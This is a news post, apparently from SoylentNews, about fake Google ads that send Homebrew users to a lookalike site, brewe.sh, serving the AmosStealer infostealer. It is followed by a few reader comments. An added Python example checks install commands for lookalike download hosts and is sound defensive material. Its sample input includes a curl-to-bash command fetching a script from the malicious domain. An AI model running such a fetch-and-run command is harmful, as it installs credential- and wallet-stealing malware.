Arthur T Knackerbracket has processed the following story:
Leveraging an attack vector that's been in play off and on for the last two decades, hackers are targeting Mac users with malware camouflaged as the popular Homebrew tool, and spreading it through deceptive Google ads.
Malicious actors are leveraging Google ads to distribute malware through a counterfeit Homebrew website. The campaign targets macOS and Linux users with an infostealer that compromises credentials, browser data, and cryptocurrency wallets.
Homebrew, a widely used open-source package manager, enables users to install and manage software from the command line. Hackers recently exploited its popularity by creating a malicious Google ad.
The ad, spotted by developer Ryan Chenkie, appeared legitimate, displaying the correct URL for the Homebrew website, "brew.sh." However, users who clicked it were redirected to a fake website hosted at "brewe.sh."
The fake site mimicked Homebrew's installation process, tricking visitors into running a malicious command. While the legitimate Homebrew site also provides such installation commands, running the script from the fake site downloaded and executed malware, specifically AmosStealer.
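The attack above works because the "paste this into your terminal" command from the fake site looks exactly like the real one, differing only in the host it downloads from. A defensive habit is to audit the hosts a one-liner fetches from before running it. The following added example (not code from the story, from Homebrew, or from any of the people quoted) does that in Python: it extracts every URL from an install command, accepts only exact matches or dot-separated subdomains of an allowlist, and flags near-miss hosts such as the "brewe.sh" domain the story describes. The allowlist assumes brew.sh (named in the story) and raw.githubusercontent.com, which is the host the official Homebrew one-liner downloads install.sh from at the time of writing but is not quoted on the page; the sample commands are constructed and nothing is downloaded.

```python
"""Audit a copy-pasted install command for untrusted or lookalike download hosts.

Added example; not part of the original story or the Homebrew project.
"""
import re
from urllib.parse import urlparse

# Hosts the legitimate Homebrew install flow uses. brew.sh comes from the story;
# raw.githubusercontent.com is an assumption (the host of the official
# install.sh at the time of writing, not stated in the story).
TRUSTED_HOSTS = frozenset({"brew.sh", "raw.githubusercontent.com"})

# Pull URLs out of a shell command; stop at whitespace and shell punctuation.
URL_RE = re.compile(r"https?://[^\s'\"<>|;&)]+")


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to flag lookalike hosts (brewe.sh vs brew.sh is 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # deletion
                           cur[j - 1] + 1,         # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


def host_is_trusted(host: str) -> bool:
    """Exact match or a real (dot-separated) subdomain of a trusted host.

    A bare endswith("brew.sh") would accept "notbrew.sh"; requiring the
    leading dot rejects it while still allowing "www.brew.sh".
    """
    host = host.lower().rstrip(".")
    return any(host == t or host.endswith("." + t) for t in TRUSTED_HOSTS)


def audit_install_command(cmd: str) -> list[dict]:
    """One finding per URL: host, trust verdict, and the trusted host it
    resembles if it is within two edits (a strong typo-squat signal)."""
    findings = []
    for url in URL_RE.findall(cmd):
        host = urlparse(url).hostname or ""
        finding = {"url": url, "host": host,
                   "trusted": host_is_trusted(host), "lookalike_of": None}
        if not finding["trusted"]:
            dist, nearest = min((levenshtein(host, t), t) for t in TRUSTED_HOSTS)
            if dist <= 2:
                finding["lookalike_of"] = nearest
        findings.append(finding)
    return findings


def command_is_safe_to_run(cmd: str) -> bool:
    """True only if the command fetches at least one URL and every host is trusted."""
    findings = audit_install_command(cmd)
    return bool(findings) and all(f["trusted"] for f in findings)


if __name__ == "__main__":
    # Constructed samples: the official-looking one-liner and a lookalike on
    # the brewe.sh domain from the story. Nothing is actually fetched or run.
    legit = '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
    fake = '/bin/bash -c "$(curl -fsSL https://brewe.sh/install.sh)"'
    for cmd in (legit, fake):
        verdict = "SAFE" if command_is_safe_to_run(cmd) else "UNSAFE"
        print(verdict, audit_install_command(cmd))
```

The check is deliberately host-based rather than path-based: a lookalike site can copy the install script byte for byte, so the only thing that reliably distinguishes the real one-liner from the fake is where it downloads from, which is exactly the detail the ad's displayed URL was designed to hide.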
AmosStealer, also known as "Atomic Stealer," is a macOS-focused infostealer sold to cybercriminals for $1,000 per month. It targets over 50 cryptocurrency wallets, browser-stored data, and desktop apps.
Previously, this malware has been used in similar campaigns, including fake Google Meet pages, making it a go-to tool for Apple-focused cyberattacks.
Homebrew's project leader, Mike McQuaid, expressed frustration with Google's inability to prevent such scams. While the malicious ad was taken down, McQuaid highlighted that similar incidents continue to occur due to insufficient oversight of sponsored ads.
Cybersecurity experts recommend avoiding sponsored links when searching for popular tools. Bookmarking official websites or accessing them directly can help users minimize risk.
[...] To stay safe from these types of attacks, make sure to double-check website URLs before clicking, stick to bookmarks for trusted sites, and steer clear of installing software from unfamiliar or sponsored links.
Google has taken down this one particular malicious ad. As history has proven, the danger from bad ads isn't gone, so Mac users — especially those using Homebrew — need to stay alert.
(Score: 0) by Anonymous Coward on Sunday February 02, @05:29AM (2 children)
Huh, can't Google even automate banning/blocking of such stuff? I can understand not being able to block it if it goes to a url shortener or the scam site directly (which might show innocuous stuff mostly except for targets).
Maybe Google sacked the developer who was doing such stuff? 😉
(Score: 4, Insightful) by Mykl on Sunday February 02, @09:59PM (1 child)
Here, "inability" should be read as "unwillingness to put in the effort required"
(Score: 2) by Ox0000 on Monday February 03, @06:07PM
But but... that costs money!
(Score: 2) by jman on Monday February 03, @05:13PM
This is why one learns to compile code. Sure, if you get the source from a dodgy repo, you can still be in trouble, but so far openssl, curl, bash, etc. are all secure sites, and hopefully will remain that way.